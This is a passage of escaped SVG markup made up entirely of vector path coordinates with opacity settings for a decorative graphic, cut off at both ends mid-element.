d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 